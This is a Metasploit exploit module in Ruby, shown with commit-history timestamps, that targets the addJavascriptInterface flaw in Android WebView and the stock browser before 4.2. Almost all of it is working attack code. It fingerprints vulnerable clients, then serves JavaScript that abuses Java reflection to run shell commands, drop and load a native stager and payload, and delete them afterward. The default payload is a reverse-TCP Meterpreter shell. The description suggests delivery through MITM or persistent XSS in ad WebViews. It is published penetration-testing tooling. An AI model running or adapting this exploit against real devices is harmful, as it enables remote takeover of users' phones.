metasploit-framework/modules/exploits/android/browser/webview_addjavascriptinterf...

140 lines
5.3 KiB
Ruby
Raw Normal View History

2014-02-04 07:37:09 +00:00
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
include Msf::Exploit::Remote::BrowserExploitServer
2014-02-04 08:32:12 +00:00
include Msf::Exploit::Remote::BrowserAutopwn
autopwn_info({
:os_flavor => "Android",
:arch => ARCH_ARMLE,
:javascript => true,
:rank => ExcellentRanking,
:vuln_test => %Q|
for (i in top) {
try {
2014-02-04 08:49:07 +00:00
top[i].getClass().forName('java.lang.Runtime');
2014-02-04 08:32:12 +00:00
is_vuln = true; break;
} catch(e) {}
}
|
})
2014-02-04 07:37:09 +00:00
def initialize(info = {})
super(update_info(info,
2014-02-04 20:24:36 +00:00
'Name' => 'Android Browser and WebView addJavascriptInterface Code Execution',
2014-02-04 07:37:09 +00:00
'Description' => %q{
2014-02-04 20:24:36 +00:00
This module exploits a privilege escalation issue in Android < 4.2's WebView component
that arises when untrusted Javascript code is executed by a WebView that has one or more
2014-02-04 08:47:49 +00:00
Interfaces added to it. The untrusted Javascript code can call into the Java Reflection
APIs exposed by the Interface and execute arbitrary commands.
Some distributions of the Android Browser app have an addJavascriptInterface
call tacked on, and thus are vulnerable to RCE. The Browser app in the Google APIs
2014-02-04 08:49:07 +00:00
4.1.2 release of Android is known to be vulnerable.
2014-02-04 08:47:49 +00:00
A secondary attack vector involves the WebViews embedded inside a large number
of Android applications. Ad integrations are perhaps the worst offender here.
2014-02-04 08:55:10 +00:00
If you can MITM the WebView's HTTP connection, or if you can get a persistent XSS
2014-02-04 08:47:49 +00:00
into the page displayed in the WebView, then you can inject the html/js served
by this module and get a shell.
2014-02-04 07:44:39 +00:00
2014-02-04 07:37:09 +00:00
Note: Adding a .js to the URL will return plain javascript (no HTML markup).
},
'License' => MSF_LICENSE,
'Author' => [
'jduck', # original msf module
'joev' # static server
2014-02-04 07:37:09 +00:00
],
'References' => [
['URL', 'http://blog.trustlook.com/2013/09/04/alert-android-webview-addjavascriptinterface-code-execution-vulnerability/'],
2014-02-04 07:37:09 +00:00
['URL', 'https://labs.mwrinfosecurity.com/blog/2012/04/23/adventures-with-android-webviews/'],
['URL', 'http://50.56.33.56/blog/?p=314'],
['URL', 'https://labs.mwrinfosecurity.com/advisories/2013/09/24/webview-addjavascriptinterface-remote-code-execution/'],
['URL', 'https://github.com/mwrlabs/drozer/blob/bcadf5c3fd08c4becf84ed34302a41d7b5e9db63/src/drozer/modules/exploit/mitm/addJavaScriptInterface.py']
2014-02-04 07:37:09 +00:00
],
2014-02-25 00:13:18 +00:00
'Platform' => 'android',
'Arch' => ARCH_DALVIK,
'DefaultOptions' => { 'PAYLOAD' => 'android/meterpreter/reverse_tcp', },
2014-02-04 07:37:09 +00:00
'Targets' => [ [ 'Automatic', {} ] ],
'DisclosureDate' => 'Dec 21 2012',
'DefaultTarget' => 0,
'BrowserRequirements' => {
:source => 'script',
:os_flavor => "Android",
:arch => ARCH_ARMLE
}
2014-02-04 07:37:09 +00:00
))
end
def on_request_uri(cli, req)
if req.uri.end_with?('js')
print_status("Serving javascript")
send_response(cli, js, 'Content-type' => 'text/javascript')
else
super
2014-02-04 07:37:09 +00:00
end
end
def on_request_exploit(cli, req, browser)
print_status("Serving exploit HTML")
send_response_html(cli, html)
end
2014-03-23 16:36:26 +00:00
def ndkstager(stagename)
localfile = File.join(Msf::Config::InstallRoot, 'data', 'android', 'libs', 'armeabi', 'libndkstager.so')
data = File.read(localfile, :mode => 'rb')
data.gsub!('PLOAD', stagename)
2014-02-25 00:13:18 +00:00
end
2014-02-04 07:37:09 +00:00
def js
2014-03-23 16:36:26 +00:00
stagename = Rex::Text.rand_text_alpha(5)
2014-02-04 07:37:09 +00:00
%Q|
2014-02-04 08:32:12 +00:00
function exec(obj) {
2014-02-04 07:37:09 +00:00
// ensure that the object contains a native interface
2014-02-04 08:49:07 +00:00
try { obj.getClass().forName('java.lang.Runtime'); } catch(e) { return; }
2014-02-04 07:37:09 +00:00
// get the runtime so we can exec
var m = obj.getClass().forName('java.lang.Runtime').getMethod('getRuntime', null);
2014-02-25 00:13:18 +00:00
var runtime = m.invoke(null, null);
var stageData = "#{Rex::Text.to_hex(payload.raw, '\\\\x')}";
2014-03-23 16:36:26 +00:00
var libraryData = "#{Rex::Text.to_hex(ndkstager(stagename), '\\\\x')}";
2014-02-04 20:24:36 +00:00
2014-02-04 07:37:09 +00:00
// get the process name, which will give us our data path
2014-02-25 00:13:18 +00:00
var p = runtime.exec(['/system/bin/sh', '-c', 'cat /proc/$PPID/cmdline']);
2014-02-04 07:37:09 +00:00
var ch, path = '/data/data/';
while ((ch = p.getInputStream().read()) != 0) { path += String.fromCharCode(ch); }
2014-02-25 00:13:18 +00:00
var libraryPath = path + '/lib#{Rex::Text.rand_text_alpha(8)}.so';
2014-03-23 16:36:26 +00:00
var stagePath = path + '/#{stagename}.apk';
2014-03-23 17:00:29 +00:00
var dexPath = path + '/#{stagename}.dex';
2014-02-25 00:13:18 +00:00
// build the library and chmod it
runtime.exec(['/system/bin/sh', '-c', 'echo "'+libraryData+'" > '+libraryPath]).waitFor();
runtime.exec(['chmod', '700', libraryPath]).waitFor();
// build the stage, chmod it, and load it
runtime.exec(['/system/bin/sh', '-c', 'echo "'+stageData+'" > '+stagePath]).waitFor();
runtime.exec(['chmod', '700', stagePath]).waitFor();
2014-02-04 07:37:09 +00:00
2014-02-25 00:13:18 +00:00
runtime.load(libraryPath);
2014-03-23 16:36:26 +00:00
runtime.exec(['rm', stagePath]).waitFor();
2014-03-23 17:00:29 +00:00
runtime.exec(['rm', libraryPath]).waitFor();
runtime.exec(['rm', dexPath]).waitFor();
2014-02-04 07:37:09 +00:00
return true;
}
2014-02-04 08:32:12 +00:00
for (i in top) { if (exec(top[i]) === true) break; }
2014-02-04 07:37:09 +00:00
|
end
def html
"<!doctype html><html><body><script>#{js}</script></body></html>"
end
end